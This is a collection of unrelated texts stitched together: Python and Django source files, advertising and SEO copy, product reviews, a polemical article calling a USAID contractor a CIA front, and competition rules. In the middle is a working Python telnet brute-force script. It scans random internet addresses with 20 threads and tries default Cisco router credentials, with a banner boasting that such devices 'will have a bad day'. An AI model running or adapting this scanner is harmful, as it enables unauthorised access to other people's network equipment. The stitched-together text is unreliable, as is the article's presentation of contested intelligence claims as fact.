from snippets.models import Snippet from snippets.serializers import SnippetSerializer from django.http import Http404 from rest_framework.views import APIView from rest_framework.response import Response from rest_framework import status class SnippetDetail(APIView): """ Retrieve, update or delete a snippet instance. """ def get_object(self, pk): try: return Snippet.objects.get(pk=pk) except Snippet.DoesNotExist: raise Http404 def get(self, request, pk, format=None): snippet = self.get_object(pk) serializer = SnippetSerializer(snippet) return Response({ 'message': 'The snippet has been found successfully.', 'data': serializer.data, 'error': False, 'errorDetails': None }) def put(self, request, pk, format=None): snippet = self.get_object(pk) serializer = SnippetSerializer(snippet, data=request.data) if serializer.is_valid(): serializer.save() return Response({ 'message': 'The snippet has been updated successfully.', 'data': serializer.data, 'error': False, 'errorDetails': None }) return Response({ 'message': 'There are one or more errors in the data sent.', 'data': request.data, 'error': True, 'errorDetails': serializer.errors }, status=status.HTTP_400_BAD_REQUEST) def delete(self, request, pk, format=None): snippet = self.get_object(pk) serializer = SnippetSerializer(snippet) snippet.delete() return Response({ 'message': 'The snippet has been deleted successfully.', 'data': serializer.data, 'error': False, 'errorDetails': None }, status=status.HTTP_204_NO_CONTENT)
These three documents are disavowals of those who oppose the Islamic State of Iraq (ISI) and pledges of allegiance to ISI. In their pledge, the authors disavow any party or group that works against ISI and pledge their allegiance to it. They also assert that they surrender their weapons.
# Copyright (c) 2014-2019. Mount Sinai School of Medicine # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from __future__ import print_function import os import re from setuptools import setup, find_packages readme_filename = "README.md" current_directory = os.path.dirname(__file__) readme_path = os.path.join(current_directory, readme_filename) try: with open(readme_path, 'r') as f: readme_markdown = f.read() except Exception as e: readme_markdown = "" print(e) print("Failed to open %s" % readme_path) # Determine version number with open('varcode/__init__.py', 'r') as f: version = re.search( r'^__version__\s*=\s*[\'"]([^\'"]*)[\'"]', f.read(), re.MULTILINE).group(1) print("Version: %s" % version) if __name__ == '__main__': setup( name='varcode', packages=find_packages(), package_data={'varcode.cli': ['logging.conf']}, version=version, description="Variant annotation in Python", long_description=readme_markdown, long_description_content_type='text/markdown', url="https://github.com/openvax/varcode", author="Alex Rubinsteyn", author_email="alex@openvax.org", license="http://www.apache.org/licenses/LICENSE-2.0.html", classifiers=[ 'Development Status :: 3 - Alpha', 'Environment :: Console', 'Operating System :: OS Independent', 'Intended Audience :: Science/Research', 'License :: OSI Approved :: Apache Software License', 'Programming Language :: Python', 'Topic :: Scientific/Engineering :: Bio-Informatics', ], install_requires=[ 'numpy>=1.7, <2.0', 'pandas>=0.15', 'pyensembl>=1.8.1', 'biopython>=1.64', 'pyvcf>=0.6.7', 'memoized_property>=1.0.2', 'serializable>=0.2.1', 'sercol>=0.1.4', ], entry_points={ 'console_scripts': [ 'varcode-genes = varcode.cli.genes_script:main', 'varcode = varcode.cli.effects_script:main', ] })
Z-Patch is a heavy-duty, high compression strength floor patch for repairing and resurfacing damaged plant floors. It renews and repairs spalled and damaged floors, fills and eliminates damaged expansion joints, and anchors machinery. Z-Patch absorbs vibration and shock without cracking and is excellent for expansion and contraction applications. It withstands heavy, abusive traffic and is extra-long wearing. We have aggregate epoxy flooring in a large portion of our facility. Some of it has started to fail in spots and we have used this product to repair the failed areas with good results. Very impressed with the product. The product is portioned in such a way that it eliminates mixture mistakes by the end user. The material is virtually bomb proof. Good thing as areas of application my crews just may find such.
import time import sys import gc import os import datetime class Profiler: profile_map = {} start_time = 0.0 section_start_time = 0.0 @staticmethod def start(profile_name=''): if profile_name not in Profiler.profile_map: Profiler.profile_map[profile_name] = time.perf_counter() else: print('%s is already exists.' % profile_name) @staticmethod def end(profile_name=''): if profile_name in Profiler.profile_map: start_time = Profiler.profile_map.pop(profile_name) print('%s : %.2fms' % (profile_name, (time.perf_counter() - start_time) * 1000.0)) @staticmethod def set_stop_watch(): Profiler.start_time = time.perf_counter() Profiler.section_start_time = Profiler.start_time @staticmethod def get_stop_watch(profile_name=''): current_time = time.perf_counter() print('%s : %.2fms ( elapsed %.2fms )' % (profile_name, (current_time - Profiler.section_start_time) * 1000.0, (current_time - Profiler.start_time) * 1000.0)) Profiler.section_start_time = current_time @staticmethod def check(func): def decoration(*args, **kargs): start_time = time.perf_counter() result = func(*args, **kargs) print('%s : %.2fms' % (func.__name__, (time.perf_counter() - start_time) * 1000.0)) return result return decoration def GetClassName(cls): return cls.__class__.__name__ def is_gz_compressed_file(filename): with open(filename,'rb') as f: return f.read(3) == b'\x1f\x8b\x08' return False def check_directory_and_mkdir(dirname): if dirname and not os.path.exists(dirname): os.makedirs(dirname) def get_modify_time_of_file(filepath): if filepath != "" and os.path.exists(filepath): timeStamp = os.path.getmtime(filepath) return str(datetime.datetime.fromtimestamp(timeStamp)) return str(datetime.datetime.min) def delete_from_referrer(obj): """ desc : Find and remove all references to obj. """ referrers = gc.get_referrers(obj) for referrer in referrers: if type(referrer) == dict: for key, value in referrer.items(): if value is obj: referrer[key] = None def object_copy(src, dst): dst.__dict__ = src.__dict__
Shop the Eddie Bauer sale today and you can receive a 40% discount on items from the Horizon collection. Shop for men and discover discounts on pants, capris, and shorts. All of these items are perfect for the outdoors. No Eddie Bauer promo code needed. Enjoy a 40% discount on the Horizon Collection for women when you shop the Eddie Bauer sale today. Discover discounts on pants, capris, and shorts. No Eddie Bauer promo code needed. Get a 65% discount on Women’s Stayshape Denim when you use this Eddie Bauer promo code and shop online. Don't miss out on this limited time offer to save on denim. Get the latest outdoor clothing online at Eddie Bauer. Use this Eddie Bauer coupon and save 65% on Women's StayShape Boot Cut Jeans - Curvy. You will also receive free shipping on your order. Discover more discounts on outdoor clothing and accessories at Eddie Bauer. These Women's StayShape Straight Leg Jeans - Curvy are currently 65% off when you apply this Eddie Bauer promo code online. Enjoy this discount and many more when you shop for outdoor clothing online at Eddie Bauer. This Eddie Bauer promo code will get you a 65% discount when you purchase the StayShape Straight Leg Jeans - Slightly Curvy for women. Get the latest outdoor clothing when you shop online at Eddie Bauer. Save a huge 65% on these Women's StayShape High-Rise Slim Straight Jeans when you use this Eddie Bauer coupon and purchase online. Get the latest outdoor clothing trends from Eddie Bauer today.
import threading import telnetlib import sys import socket import random import thread import time print "|","-"*61, "|" print "|\tAll of cisco routers , switches with default\t\t|\n|\tusername and passwords are will have a bad day today\t|" print "|","-"*61, "|" def bruteForce(ip): dict={"Administrator":"admin","|Administrator":"changeme","cisco":"cisco","admin":"admin","|admin":"diamond","||admin":"cisco","root":"Cisco","|root":"password","||root":"blender","|||root":"attack","bbsd-client":"changeme2","cmaker":"cmaker","cusadmin":"password","hsa":"hsadb","netrangr":"attack","wlse":"wlsedb","wlseuser":"wlseuser"} for key,value in dict.iteritems(): key = key.replace("|" , "") try: #print " Trying User:",key," Password:",value ," on " , ip tn = telnetlib.Telnet(ip,23,2) tn.read_until((":" or ">" or "$" or "@")) tn.write(key + "\n") tn.read_until((":" or ">" or "$" or "@")) tn.write(value + "\n") tn.write("dir\n") tn.write("exit\n") tn.read_all()#we can print this to get the banner print "\t\nLogin successful:", key , " -> " , value tn.close() sys.exit(1) except Exception ,e: #print ip , " --> " , e pass finally: try: tn.close() except Exception , e: pass #randy() def randy(): a=random.randint(1,254) b=random.randint(1,254) c=random.randint(1,254) d=random.randint(1,4) ip=str(a) + "." +str(b) + "." +str(c) + "." +str(d) try: telnetlib.Telnet(ip , 23 , 2) print "Telneting on host : " , ip bruteForce(ip) except Exception ,e: #print ip," => does not have telnet enabled" , e randy() for threads in range(0,20): thread.start_new_thread(randy,()) time.sleep(0.5) """ if len(sys.argv) !=4: print "Usage: ./telnetbrute.py <server> <userlist> <wordlist>" sys.exit(1) #---------------------------------------------------------------- try: userlist = open(sys.argv[2], "r").readlines() #userlist.close() for user in userlist: user = user.strip("\n") users.append(user) except(IOError): print "Error: Check your userlist path\n" sys.exit(1) #------------------------------------------------------------------ try: wordlist = open(sys.argv[3], "r").readlines() #wordlist.close() except(IOError): print "Error: Check your wordlist path\n" sys.exit(1) for word in wordlist: words.append(word) #lock = threading.Lock() #lock.acquire() #lock.release() for key , value in dict.iteritems(): print key.replace("|","")+"="+value """
SEO Manor lakes - David Lurie "Mr SEO" SEO Consultant Manor lakes. Manor lakes seo services and online marketing programs for fast business growth with Manor lakes's local seo expert and online marketing consultant David Lurie. Business clients regard his seo Manor lakes business services as the best due to the consistent growth in lead, sales and profits he has been able to help them achieve in their businesses with his web marketing and local SEO services. As one of the best online marketing & seo consultants that services Manor lakes, you'll find tons of seo client results testimonials on this website which show how effective his online marketing and seo strategies are and how he can help your business. If you want a proven seo Manor lakes consultant that has a strong track record of growth spanning over a decade then you should research more about David Lurie and his online marketing and seo consulting services by spending some time on this this site.
import bpy import sys from bpy.props import * from .. base_types import UMOGSocket from .. utils.events import propUpdate class BooleanSocket(bpy.types.NodeSocket, UMOGSocket): # Description string '''Custom Boolean socket type''' # Optional identifier string. If not explicitly defined, the python class name is used. bl_idname = 'BooleanSocketType' # Label for nice name display bl_label = 'Boolean Socket' dataType = "Boolean" allowedInputTypes = ["Float", "Integer", "Boolean"] useIsUsedProperty = False defaultDrawType = "PREFER_PROPERTY" drawColor = (0.247058824, 0.317647059, 0.705882353, 1) value = BoolProperty(default=True, update=propUpdate) def drawProperty(self, context, layout, layoutParent, text, node): layout.prop(self, "value", text=text) pass def refresh(self): self.name = str(self.value) def getValue(self): return self.value def setProperty(self, data): if type(data) is bool: self.value = data else: self.value = data > 0 def getProperty(self): return self.value
I will likely be using Twilio for SMS integration in future projects. What really sold me was this infographic that they used to demonstrate how easy it is to programmatically send an SMS. Interestingly though, they didn’t appear when I did a Google search for how to programmatically send a text message.
import os # import djcelery from django.contrib.messages import constants as messages # djcelery.setup_loader() SITE_ROOT = os.path.join(os.path.realpath(os.path.dirname(__file__)), '../../') # Changes the naming on the front-end of the website. SITE_NAME = 'Searcular v2' # Set to False to disable people from creating new accounts. ALLOW_NEW_REGISTRATIONS = True # Set to False to force users to login before seeing any pins. PUBLIC = True TIME_ZONE = 'Europe/London' LANGUAGE_CODE = 'en-us' USE_I18N = True USE_L10N = True USE_TZ = True MEDIA_URL = '/media/' STATIC_URL = '/static/' MEDIA_ROOT = os.path.join(SITE_ROOT, 'media') STATIC_ROOT = os.path.join(SITE_ROOT, 'static') TEMPLATE_DIRS = [os.path.join(SITE_ROOT, 'pinry/templates')] STATICFILES_DIRS = [os.path.join(SITE_ROOT, 'pinry/static')] STATICFILES_FINDERS = ( 'django.contrib.staticfiles.finders.FileSystemFinder', 'django.contrib.staticfiles.finders.AppDirectoriesFinder', 'compressor.finders.CompressorFinder' ) TEMPLATE_LOADERS = ( 'django.template.loaders.filesystem.Loader', 'django.template.loaders.app_directories.Loader', ) MIDDLEWARE_CLASSES = ( 'django.middleware.common.CommonMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'pinry.users.middleware.Public', 'pinry.core.middleware.Public', ) TEMPLATE_CONTEXT_PROCESSORS = ( 'django.contrib.auth.context_processors.auth', 'django.core.context_processors.debug', 'django.core.context_processors.i18n', 'django.core.context_processors.media', 'django.core.context_processors.static', 'django.core.context_processors.request', 'django.contrib.messages.context_processors.messages', 'pinry.core.context_processors.template_settings', ) AUTHENTICATION_BACKENDS = ( 'pinry.users.auth.backends.CombinedAuthBackend', 'django.contrib.auth.backends.ModelBackend', ) ROOT_URLCONF = 'pinry.urls' LOGIN_URL = '/login/' LOGIN_REDIRECT_URL = '/' INTERNAL_IPS = ['127.0.0.1'] MESSAGE_TAGS = { messages.WARNING: 'alert', messages.ERROR: 'alert alert-error', messages.SUCCESS: 'alert alert-success', messages.INFO: 'alert alert-info', } API_LIMIT_PER_PAGE = 50 INSTALLED_APPS = ( 'django.contrib.auth', 'django.contrib.admin', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'south', 'taggit', 'compressor', 'django_images', 'provider', 'provider.oauth2', 'pinry.core', 'pinry.users', ) IMAGE_PATH = 'pinry.core.utils.upload_path' IMAGE_SIZES = { 'thumbnail': {'size': [240, 0]}, 'standard': {'size': [600, 0]}, 'square': {'crop': True, 'size': [125, 125]}, }
Includes unlimited streaming of Kykeon via the free Bandcamp app, plus high-quality download in MP3, FLAC and more. Figure continues its new limited edition hybrid disc ' x.5 ' series with a special 2 track offering from Johannes Heil. 'Kykeon I' represents an unabashed, smiles-abound floor-filler with one of Heil's most joyful and accessible productions to date. A perfect heady cocktail of slamming 90s drums and uplifting house- stab melodies, the german producer has really struck a chord here with this future club-classic. The spaced out stepping beats of 'Kykeon II' then, sit in welcome contrast to the all out madness of its bigger brother. Subtle, intelligent Techno formations rise and swell, based around a similar melodic framework to that found in part I. Another masterclass from one of the most talented producers in the business. written & produced by Johannes Heil.
''' The MIT License (MIT) Copyright (c) 2016 kagklis Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ''' from math import sqrt import numpy as np from copy import deepcopy from pandas import Series, DatetimeIndex import statsmodels.api as sm from statsmodels.graphics.api import qqplot from statsmodels.tsa.arima_model import _arma_predict_out_of_sample def limit_range(values, nm, nM): M = max(values) m = min(values) oldRange = M-m newRange = nM-nm for i in range(len(values)): values[i] = (((values[i] - m)*newRange)/oldRange) + nm return(values) def mean(values): return (sum(values)*1.0)/len(values) def stanDev(values): m = mean(values) total_sum = 0 for i in range(len(values)): total_sum += (values[i]-m)**2 under_root = (total_sum*1.0)/len(values) return (m,sqrt(under_root)) def linreg(X, Y): """ return a,b in solution to y = ax + b such that root mean square distance between trend line and original points is minimized """ N = len(X) Sx = Sy = Sxx = Syy = Sxy = 0.0 for x, y in zip(X, Y): Sx = Sx + x Sy = Sy + y Sxx = Sxx + x*x Syy = Syy + y*y Sxy = Sxy + x*y det = Sxx * N - Sx * Sx return (Sxy * N - Sy * Sx)/det, (Sxx * Sy - Sx * Sxy)/det def predict(data, Ds, AL, steps): key = data.keys() key = key[0] V = len(data[key]) # Create N-step prediction using ARMA method on the initial timeseries res = sm.tsa.ARMA(data[key][0:(V-1-steps)], (3, 0)).fit() params = res.params residuals = res.resid p = res.k_ar q = res.k_ma k_exog = res.k_exog k_trend = res.k_trend temp = _arma_predict_out_of_sample(params, steps, residuals, p, q, k_trend, k_exog, endog=data[key], exog=None, start=V-steps) pArma = [data[key][V-steps-1]] pArma.extend(temp) arma_t = Series(pArma, index=DatetimeIndex([data[key].index[V-steps-1+i] for i in range(steps+1)],freq="D")) print("ARMA: \n",arma_t) pred = deepcopy(data) offset = 1 # Create N-step prediction using recursive ARMA method on the initial timeseries for ss in range(steps, 0, -offset): res = sm.tsa.ARMA(pred[key][0:(V-1-ss)], (3, 0)).fit() params = res.params residuals = res.resid p = res.k_ar q = res.k_ma k_exog = res.k_exog k_trend = res.k_trend pred[key][V-ss] = _arma_predict_out_of_sample(params, offset, residuals, p, q, k_trend, k_exog, endog=data[key], exog=None, start=V-ss)[0] rArma = [data[key][V-steps-1]] rArma.extend(pred[key][V-steps:(V+1)]) arma_t_r = Series(rArma, index=DatetimeIndex([data[key].index[V-steps-1+i] for i in range(steps+1)],freq="D")) print("rARMA: \n",arma_t_r) # Create N-step prediction using Summarization Features ext_Ds = np.pad(Ds, steps, mode='symmetric') ext_Ds = [ext_Ds[len(ext_Ds)-steps+i] for i in range(steps)] #print("Ds:",ext_Ds) m, s = stanDev(data[key]) a,b = linreg(range(len(AL)), AL) r = [a*index + b for index in range(len(AL)+steps)] temp2 = [(ext_Ds[i]+r[len(AL)-1+i])/10 for i in range(steps)] fcst = [data[key][V-steps-1]] fcst.extend(temp2) summarized_t = Series(fcst, index=DatetimeIndex([data[key].index[V-steps-1+i] for i in range(steps+1)],freq="D")) print("Summarized: \n",summarized_t) return(arma_t, arma_t_r, summarized_t)
An article published in the December 12th edition of the New York Times (http://www.nytimes.com/2009/12/12/world/americas/12cuba.html?_r=1) revealed the detention of a US government contract employee in Havana this past December 5th. The employee, whose name has not yet been disclosed, works for Development Alternatives, Inc. (DAI), one of the largest US government contractors providing services to the State Department, the Pentagon and the US Agency for International Development (USAID). The employee was detained while distributing cellular telephones, computers and other communications equipment to Cuban dissident and counterrevolutionary groups that work to promote US agenda on the Caribbean island. Last year, the US Congress approved $40 million to �promote transition to democracy� in Cuba. DAI was awarded the main contract, �The Cuba Democracy and Contingency Planning Program�, with oversight by State and USAID. The use of a chain of entities and agencies is a mechanism employed by the Central Intelligence Agency (CIA) to channel and filter funding and strategic political support to groups and individuals that support US agenda abroad. The pretext of �promoting democracy� is a modern form of CIA subversion tactics, seeking to infiltrate and penetrate civil society groups and provide funding to encourage �regime change� in strategically important nations, such as Venezuela, with governments unwilling to subcomb to US dominance. DAI was contracted in June 2002 by USAID to manage a multimillion dollar contract in Venezuela, just two months after the failed coup d�etat against President Hugo Ch�vez. Prior to this date, USAID had no operations in Venezuela, not even an office in the Embassy. DAI was charged with opening the Office for Transition Initiatives (OTI), a specialized branch of USAID that manages large quantities of liquid funds destined for organizations and political parties favorable to Washington in countries of strategic interest that are undergoing political crises. The first contract between USAID and DAI for its Venezuela operations authorized $10 million for a two year period. DAI opened its doors in the Wall Street of Caracas, El Rosal, in August 2002, and began to immediately fund the same groups that just months earlier had executed - unsuccessfully � the coup against President Ch�vez. The USAID/DAI funds in Venezuela were distributed to organizations such as Fedec�maras and the Confederaci�n de Trabajadores Venezolanos (CTV), two of the principal entities that had led the coup in April 2002 and that later headed another attempt to oust Ch�vez by imposing an economic sabotage and oil industry strike that crippled the nation�s economy. One contract between DAI and these organizations, dated December 2002, awarded more than $10,000 to help design radio and television propaganda against President Ch�vez. During that time period, Venezuela experienced one of the most viscious media wars in history. Private television and radio stations, together with print media, devoted non-stop programming to opposition propaganda for 64 days, 24 hours a day. In February 2003, DAI began to fund a recently created group named S�mate, led by Maria Corina Machado, one of the signators of the �Carmona Decree�, the famous dictatorial decree that dissolved all of Venezuela�s democratic institutions during the brief April 2002 coup d�etat. S�mate soon became the principal opposition organization directing campaigns against President Ch�vez, including the August 2004 recall referendum. The three main agencies from Washington operating in Venezuela at that time, USAID, DAI and the National Endowment for Democracy (�NED�), invested more than $9 million in the opposition campaign to oust Ch�vez via recall referendum, without success. Ch�vez won with a 60-40 landslide victory. To date, the OTI still remains in Venezuela, with DAI as its principal contractor. But now, four other entities share USAID�s multimillion dollar pie in Caracas: International Republican Institute (IRI), National Democratic Institute for International Affairs (NDI), Freedom House, and the PanAmerican Development Foundation (PADF). Of the 64 groups funded from 2002-2004 with approximately $5 million annually, today the OTI funds more than 533 organizations, political parties, programs and projects, mainly in opposition sectors, with an annual budget surpassing $7 million. Its presence has not only remained, but has grown. Obviously this is due to one very simple reason: the original objetive has still not been obtained; the overthrow or removal of President Hugo Ch�vez. This organization dedicated to destabilizing governments unfavorable to US interests has now made its appearance in Cuba, with millions of dollars destined to destroy the Cuban revolution. Ex CIA officer Phillip Agee affirmed that DAI, USAID and NED �are instruments of the US Embassy and behind these three organizations is the CIA.� The contract between USAID and DAI in Venezuela confirms this fact, �The field representative will maintain close collaboration with other embassy offices in identifying opportunities, selecting partners and ensuring the program remains consistent with US foreign policy.� There is no doubt that �selecting partners� is another term for �recluting agents� and �consistent with US foreign policy� means �promoting Washington�s interests�, despite issues of sovereignty. Clearly, all DAI activities are directly coordinated by the US Embassy, a fact which negates the �private� nature of the organization. The detention of a DAI employee is a very important step to impede destabilization and subversion inside Cuba. This episode also confirms that there has been no change of policy with the Obama Administration towards Cuba � the same tactics of espionage, infiltration and subversion are still being actively employed against one of Washington�s oldest adversaries. Now that Cuba has exposed the intelligence operations that DAI was engaging in (recluting agents, infiltrating political groups and distributing resources destined to promote destabilization and regime change are all intelligence activities and illegal), the Venezuelan government should respond firmly by expelling this grave threat from the country. DAI has now been operating in Venezuela for over seven and a half years, feeding the conflict with more than $50 million dollars and promoting destabilization, counterrevolution, media warfare and sabotage. In an ironic twist, currently in the United States five Cuban citizens are imprisoned on charges of alleged espionage, yet their actions in US territory were not directed towards harming US interests. But the DAI employee detained in Cuba � working for a CIA front company � was engaged in activities intended to directly harm and destabilize the Cuban government. The distribution of materials to be used for political purposes by a foreign government with the intent of promoting regime change in a nation not favorable to US interests is clearly a violation of sovereignty and an act of espionage. Development Alternatives, Inc. is one of the largest US government contractors in the world. Currently, DAI has a $50 million contract in Afghanistan. In Latin America, DAI is presently operating in Bolivia, Brasil, Colombia, Cuba, Ecuador, El Salvador, Guatemala, Hait�, Honduras, M�xico, Nicaragua, Per�, Rep�blica Dominicana and Venezuela. At least eight U.S. citizens were killed on a CIA operations base in Afghanistan this past Wednesday, December 30. A suicide bomber infiltrated Forward Operating Base Chapman located in the eastern province of Khost, which was a CIA center of operations and surveillance. Official sources in Washington have confirmed that the eight dead were all civilian employees and CIA contractors. Fifteen days ago, five U.S. citizens working for a U.S. government contractor, Development Alternatives, Inc. (DAI), were also killed in an explosion at the U.S. Agency for International Development (USAID) office in Gardez. That same day, another bomb exploded outside the DAI offices in Kabul, although no serious injuries resulted. The December 15 incident received little attention, although it occurred just days after the detention of a DAI employee in Cuba, accused of subversion and distribution of illegal materials to counterrevolutionary groups. President and CEO of DAI, Jim Boomgard, issued a declaration on December 14 regarding the detention of a subcontractor from his company in Cuba, confirming that, �the detained individual was an employee of a program subcontractor, which was implementing a competitively issued subcontract to assist Cuban civil society organizations.� The statement also emphasized the �new program� DAI is managing for the U.S. government in Cuba, the �Cuba Democracy and Contingency Planning Program�. DAI was awarded a $40 million USD contract in 2008 to help the U.S. government �support the peaceful activities of a broad range of nonviolent organizations through competitively awarded grants and subcontracts� in Cuba. DAI also runs a program in Khost where the December 30 suicide bombing occurred, although it has yet to be confirmed if the eight U.S. citizens killed were working for the major U.S. government contractor. From the operations base in Khost, the CIA remotely controls its selective assassination program against alleged Al Qaeda members in Pakistan and Afghanistan using drone (Unmanned Aerial Vehicles) Predator planes. A high-level USAID official confirmed two weeks ago that the CIA uses USAID�s name to issue contracts and funding to third parties in order to provide cover for clandestine operations. The official, a veteran of the U.S. government agency, stated that the CIA issues such contracts without USAID�s full knowledge. Since June 2002, USAID has maintained an Office for Transition Initiatives (OTI) in Venezuela, through which it has channeled more than $50 million USD to groups and individuals opposed to President Hugo Ch�vez. The same contractor active in Afghanistan and connected with the CIA, Development Alternatives Inc. (DAI), was awarded a multi-million dollar budget from USAID in Venezuela to �assist civil society and the transition to democracy�. More than two thousand documents partially declassified from USAID regarding the agency�s activities in Venezuela reveal the relationship between DAI and sectors of the Venezuelan opposition that have actively been involved in coup d�etats, violent demonstrations and other destabilization attempts against President Ch�vez. In Bolivia, USAID was expelled this year from two municipalities, Chapare and El Alto, after being accused of interventionism. In September 2009, President Evo Morales announced the termination of an official agreement with USAID allowing its operations in Bolivia, based on substantial evidence documenting the agency�s funding of violent separtist groups seeking to destabilize the country. In 2005, USAID was also expelled from Eritrea and accused of being a �neo-colonialist� agency. Ethiopia, Russia and Belarus have ordered the expulsion of USAID and its contractors during the last five years. Development Alternatives, Inc. is one of the largest U.S. government contractors in the world. The company, with headquarters in Bethesda, MD, presently has a $50 million contract with USAID for operations in Afghanistan. In Latin America, DAI has operations and field offices in Bolivia, Brazil, Colombia, Cuba, Ecuador, El Salvador, Guatemala, Haiti, Honduras, Mexico, Nicaragua, Peru, Dominican Republic and Venezuela. This year, USAID/DAI�s budget in Venezuela nears $15 million USD and its programs are oriented towards strengthening opposition parties, candidates and campaigns for the 2010 legislative elections. Just two weeks ago, President Ch�vez also denounced the illegal presence of U.S. drone planes in Venezuelan airspace. Can you imagine what kind of Holy Hell-Fire there would be in America if it was known that a foreign Government was pouring millions of dollars into guiding our electoral process?It's beyond me why other countries would accept these CIA front groups.They have only one purpose,destabalization,and regime change.
# Copyright 2012 Hewlett-Packard Development Company, L.P. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """ The Logrotate section allows you to automatically remove old build history. It adds the ``logrotate`` attribute to the :ref:`Job` definition. All logrotate attributes have default "-1" value so you don't need to specify that explicitly Example:: - job: name: test_job logrotate: daysToKeep: 3 numToKeep: 20 artifactDaysToKeep: -1 artifactNumToKeep: -1 The Assigned Node section allows you to specify which Jenkins node (or named group) should run the specified job. It adds the ``node`` attribute to the :ref:`Job` definition. Example:: - job: name: test_job node: precise That speficies that the job should be run on a Jenkins node or node group named ``precise``. """ import xml.etree.ElementTree as XML import jenkins_jobs.modules.base class General(jenkins_jobs.modules.base.Base): sequence = 10 def gen_xml(self, parser, xml, data): jdk = data.get('jdk', None) if jdk: XML.SubElement(xml, 'jdk').text = jdk XML.SubElement(xml, 'actions') desc_text = data.get('description', None) if desc_text is not None: description = XML.SubElement(xml, 'description') description.text = desc_text XML.SubElement(xml, 'keepDependencies').text = 'false' disabled = data.get('disabled', None) if disabled is not None: if disabled: XML.SubElement(xml, 'disabled').text = 'true' else: XML.SubElement(xml, 'disabled').text = 'false' if 'display-name' in data: XML.SubElement(xml, 'displayName').text = data['display-name'] if data.get('block-downstream'): XML.SubElement(xml, 'blockBuildWhenDownstreamBuilding').text = 'true' else: XML.SubElement(xml, 'blockBuildWhenDownstreamBuilding').text = 'false' if data.get('block-upstream'): XML.SubElement(xml, 'blockBuildWhenUpstreamBuilding').text = 'true' else: XML.SubElement(xml, 'blockBuildWhenUpstreamBuilding').text = 'false' if 'auth-token' in data: XML.SubElement(xml, 'authToken').text = data['auth-token'] if data.get('concurrent'): XML.SubElement(xml, 'concurrentBuild').text = 'true' else: XML.SubElement(xml, 'concurrentBuild').text = 'false' if 'workspace' in data: XML.SubElement(xml, 'customWorkspace').text = \ str(data['workspace']) if 'quiet-period' in data: XML.SubElement(xml, 'quietPeriod').text = str(data['quiet-period']) node = data.get('node', None) if node: XML.SubElement(xml, 'assignedNode').text = node XML.SubElement(xml, 'canRoam').text = 'false' else: XML.SubElement(xml, 'canRoam').text = 'true' if 'logrotate' in data: lr_xml = XML.SubElement(xml, 'logRotator') logrotate = data['logrotate'] lr_days = XML.SubElement(lr_xml, 'daysToKeep') lr_days.text = str(logrotate.get('daysToKeep', -1)) lr_num = XML.SubElement(lr_xml, 'numToKeep') lr_num.text = str(logrotate.get('numToKeep', -1)) lr_adays = XML.SubElement(lr_xml, 'artifactDaysToKeep') lr_adays.text = str(logrotate.get('artifactDaysToKeep', -1)) lr_anum = XML.SubElement(lr_xml, 'artifactNumToKeep') lr_anum.text = str(logrotate.get('artifactNumToKeep', -1))
The House on Sunset Lake Rules: 1. Open to United Kingdom and Republic of Ireland residents aged 18 or over only, except employees of the Promoter, News Corp UK & Ireland Limited, and their associated, affiliated or subsidiary companies, their families, agents or any other person(s) connected with the competition, including third party promotional partners 2. Competition closes at 11.59pm on September 3, 2016 (the “Closing Date”). Entries received after the Closing Date will not be counted. 3. One entry per person. Bulk, automatically generated or third party entries are void. 4. To enter you must click the ‘click to enter’ link on the The House on Sunset Lake page before the Closing Date. 5. There will be ten winners 6. The winners will be selected at random from all valid entries for this competition received before the Closing Date. 7. Winners will be notified by email or phone or using the other contact details provided by the winner within fourteen days after the Closing Date. All reasonable endeavours will be made to contact the winner during the specified time. If a winner cannot be contacted or is not available, the Promoter reserves the right to re-draw another winner from the valid/correct entries that were received before the Closing Date. 8. The prize is a copy of the book, The House on Sunset Lake 10. The prize is non-transferable and there are no cash alternatives to the prize in whole or in part. 11. The promoter of this competition is News Group Newspapers Ltd (publishers of The Sun) (the “Promoter”). 12. General terms and conditions for competitions apply*.
